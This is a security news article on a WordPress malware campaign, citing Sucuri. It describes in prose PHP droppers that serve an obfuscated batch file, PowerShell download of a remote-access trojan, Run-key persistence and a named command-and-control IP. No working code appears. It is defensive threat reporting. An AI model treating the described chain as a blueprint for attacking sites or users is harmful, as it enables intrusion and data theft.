Stealthy WordPress Malware Uses PHP Backdoor to Deliver Windows Trojan

A sophisticated malware campaign targeting WordPress websites has recently been uncovered, showcasing an intricate and stealthy approach to delivering a Windows-based trojan.

This attack, which operates beneath the surface of seemingly clean websites, employs a layered infection chain involving PHP-based droppers, obfuscated code, and IP-based evasion tactics to distribute a malicious payload named client32.exe.

Hidden Infection Chain

The discovery highlights the evolving tactics of cybercriminals in exploiting web platforms for malware distribution.

The infection begins with two central PHP files, header.php and man.php, which act as the main controller and administrative interface, respectively.

The header.php script profiles visitors, logs IP addresses in a file named count.txt to prevent repeated infections, and dynamically generates a heavily obfuscated Windows batch file, update.bat.

According to Sucuri Report, this batch script, forced as a download via manipulated HTTP headers, orchestrates a multi-stage attack on the victim’s system.

Multi-Stage Attack

It uses PowerShell commands to download a malicious ZIP archive, psps.zip, containing the client32.exe trojan, extracts it to a hidden directory in %APPDATA%, and executes the payload.

Additionally, the script ensures persistence by adding a registry entry to the HKEY_CURRENT_USER Run key, allowing the trojan to launch on every system reboot.

The client32.exe binary, identified as a Remote Access Trojan (RAT), establishes a covert connection to a Command and Control (C2) server at 5.252.178.123 on port 443, enabling remote control and potential data exfiltration.

The administrative file, man.php, provides attackers with a web-based panel to monitor and manipulate the IP log, resetting or appending records as needed.

This level of control, combined with the campaign’s stealth evading detection through IP blacklisting and silent execution demonstrates a calculated effort to maximize infection rates while minimizing exposure.

The use of PowerShell for payload delivery and extraction further complicates detection by endpoint security solutions, as attackers increasingly leverage legitimate system tools for malicious purposes.

For website owners, this case underscores the importance of continuous monitoring, deploying Web Application Firewalls (WAFs), and maintaining updated CMS and server software to prevent initial compromises.

End-users are urged to exercise caution with unexpected downloads, keep antivirus solutions active, and ensure system updates are applied promptly to mitigate risks.

This WordPress malware campaign serves as a stark reminder of the persistent and evolving threats in the digital landscape, where attackers push the boundaries of stealth to compromise both web platforms and end-user systems.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates